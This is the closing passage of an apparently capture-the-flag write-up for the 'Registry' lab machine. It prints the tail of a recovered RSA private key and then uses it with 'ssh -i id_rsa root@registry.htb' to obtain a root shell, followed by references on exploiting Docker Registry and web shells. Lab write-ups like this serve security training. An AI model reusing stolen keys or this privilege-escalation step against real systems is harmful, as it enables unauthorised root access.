dpbptPOnNmLUkWFXcK3bmlmrEyuafS6z68oDFeAZz8Dg2D2qXWfhdlN4GVstlxSI
skH5sAECgYEAySOp7KOZJVpstF8zjn+/OZowEF4iSHnaGAX64B6GgWwXQURn3wVq
tlqDO5m5vIexe2tyFDSVe5otWtzQvbPNkjpD7/kglGTbT9PCU/Dgb5pTmOxBPi9a
1W8+q7lwiXLIRb4NB+BqDz0yI924BnZt9rukzm9650Rrbala0HZxhIECgYEAxCux
RQUzgSx7YdzThvB8sAzQJj2gNAbwEA9Y56I0pQLvTNoGQY8V8IYBrlvW935kLfcf
xz8j5VNt1BizDQjG8j5FfVcU6VE98/OMgn4XKd6nl9sOoQBXzssjUF+3AIhn5DsK
Q/IymTZEmhfGAt9k6dE4WH8qffea/E7qJY+pkokCgYAdatLiYjb2yJfXdYkD0Vk1
YoCfFDVtZizokI9VkgFYEmgASrHqY09tJiXFZMFOeoYRp/BCVkJ6ll0Fyf/Zjt+F
AHKJOWVzbqDItw7X2gXpLKgHWJ5eKuzdBG0lDnUQFTKHSLl9Kmw4mFmp9zZ/83g3
us/qxVEzW8Vef4Nhs8D8gQKBgDtsMMqDhNKAMu+2AK1Dc8GwX+z1he28nEOBIqEn
1WKWvP4+nN6HBVJShXfXggp+UsJJtWqZiboRx5cT1EkCe6Etk8cf9cmnPmkDQXDV
2RZpx8KMLKZAgFi31/6kv759k1rjN3zVhNY8RhOXV/fOy7a4FaVY//ogYuZC0VKH
bgphAoGBAKGyJQe/b6rUkpzvIBxbGt9Hw1kpLr07VCdPQb1MCdCU4l+mlDD5NBN3
mzygp6MTi+TvN3PhxlfAmUPbz0qw+3aX95pt2cQ492wLOe+RsVsKtvDTgH/2+DUe
2qnb+Jd6ERs3jmBeuuavC2O5ajhyLt1xL3uF5UVpoenCYlYuOvL4
-----END RSA PRIVATE KEY-----

root in restore/root/.ssh
❯
```
GET THE ADMIN SHELL
```bash
root in restore/root/.ssh
❯ ssh -i id_rsa root@registry.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

System information as of Sun Apr  5 02:06:19 UTC 2020

System load:  0.0               Users logged in:                1
Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
Memory usage: 38%               IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage:   1%                IP address for docker0:         172.17.0.1
Processes:    169
Last login: Mon Oct 21 09:53:48 2019
root@bolt: whoami
root
root@bolt:~#
```
If you liked my writeup please leave a respect on my Profile

References:
Anatomy of a hack: Docker Registry
Docker Registry
Exploiting Docker Registry
p0wnyshell
Bind Shell